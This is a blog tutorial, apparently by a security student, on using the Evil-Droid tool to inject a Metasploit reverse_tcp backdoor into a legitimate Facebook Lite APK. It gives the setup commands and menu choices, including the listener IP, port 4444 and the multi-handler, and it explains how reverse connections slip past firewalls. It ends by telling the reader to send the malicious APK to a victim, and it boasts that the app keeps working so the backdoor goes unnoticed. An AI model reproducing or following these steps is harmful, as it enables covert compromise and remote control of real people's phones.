Hope your Firewall Works. If not, You are Screwed.
Where to begin with, hmmm…
Here we are using Kali Linux 2020 distribution with updated tools and Evil-Droid is downloaded from GitHub and installed as requested.
https://github.com/M4sc3r4n0/Evil-Droid
This method that I am using here works with the same network, but if we try to tune some knobs, maybe we can use this method for outside the network.
Most coolest thing about this Evil-Droid tool is super easy to use and can control easily. It will depend on some other tools, If we do not have them when we are launching the attack, Evil-Droid will identify those missing dependencies and install them easily.
In my case, at first there were no dependencies were installed. But in a one execution those missing dependencies were installed to my Kali Linux easily. Other thing is this tool helps us to inject code into a 100% working application without getting identified. Application will work normally as it should be and the backdoor is opening to us every time the user uses the application.
Then you have to make ready any .apk file downloaded to your system. I have downloaded Facebook lite apk the latest version.
So, What is Android?
Android is a mobile operating system based on a modified version of the Linux kernel and other open source software, designed primarily for touchscreen mobile devices such as smartphones and tablets. Android is developed by a consortium of developers known as the Open Handset Alliance, with the main contributor and commercial marketer being Google. Initially developed by Android Inc., which Google bought in 2005, Android was unveiled in 2007, with the first commercial Android device launched in September 2008. The current stable version is Android 10, released on September 3, 2019. The core Android source code is known as Android Open Source Project (AOSP), which is primarily licensed under the Apache License. This has allowed variants of Android to be developed on a range of other electronics, such as game consoles, digital cameras, PCs and others, each with a specialized user interface. Some well known derivatives include Android TV for televisions and Wear OS for wearable, both developed by Google.
Whats Next?
- You need to launch the Evil Droid script after getting it from GitHub,(Clone or Zip). It will auto check the missing dependencies and install them easily and automatically
cd Evid-Droid
./evil-droid
2. After a successful execution of the program this will appear on the screen. we are going with the option 3 to create a backdoor in Facebook lite apk.
(There will be an error, error from jdk dependencies. It will display that the application has failed to verify artifacts.)
Failed to verify signed artifacts[Fixed]
I just did this steps and worked for me well:
First I downloaded latest version of [apktool(2.4.1)]](https://bitbucket.org/iBotPeaches/apktool/downloads/)
Then I renamed apktool_2.4.1.jar to apktool.jar and replaced it to ~path/Evil-Droid/tools/apktool.jar and i changed version number in doc.txt to downloaded apktool version(2.4.1 for me)
And then installed openjdk-11-jdk-headless [sudo apt-get install openjdk-11-jdk-headless ]
3. Before it starts it will ask permission for start the framework and PostgreSQL and apache2 server services . we have to give the permission to continue.
4. Then select option 3 ( Backdoor APK Original New) from the menu.
5. Then it will find our IP and ask us to continue with that IP or we can select another IP for this. It comes automatically with a opened window. Same has to be done with the port number. Default will be 4444 and its fine.
5 . Then it will ask for the name of the modified application. Here we give it as Facebook_lite_new.apk
6. Then it will ask us to select the payload. For this I am selecting reverse_tcp payload.
What is reverse_tcp ?
Firewalls work on the principle of blocking incoming connections. So basically any incoming connection to a host behind the firewall is blocked by the firewall. However return traffic for the connection initiated by the device will be permitted.
Reverse tcp is basically that, instead of attacker initiating connection to the device, which gets blocked by firewall. The device will initiate connection to the attacker, which will be allowed but the firewall.
- When your browser initiates a connection to google.com, we call it as forward connection. The connection goes from client(browser) to server(google.com).
- When server wants to initiate the connection to client (it is very rare though!), we call it as reverse connection.
- Most of the forward connection to servers are firewalled. So you just cannot initiate a connection, even if you compromise the server.
- But most of the firewalls, allows connection initiated by the server to the external world.
- So compromise the remote server and ask it to initiate the connection with your system. Then you issue commands to the remote server.
That’s reverse connection!
7. Then we have to select the original APK path. It is easy to us no commands should be entered, a window will be opened and simply we have to direct it to the original APK location.
8. Process will be automatic and after the process we can get the injected, modified APK file from the location where we installed the Evil-Droid.
9. Then it will ask us to start listening to the apk with metasploit framework. we have to choose multi-handler and send our malicious APK to the victim and do the magic.
So that’s all for now. APK will work as it must work while creating us a simple backdoor on the victims mobile.
Next article we can discuss the things to do with this APK file and how will the victims mobile will respond.
Peace. Drink Responsibly :)
Written by/Chamod Wijetunga — Information Security Analyst [Intern] at CryptoGen- 3rd Year 2nd Semester -Cyber Security Student-SLIIT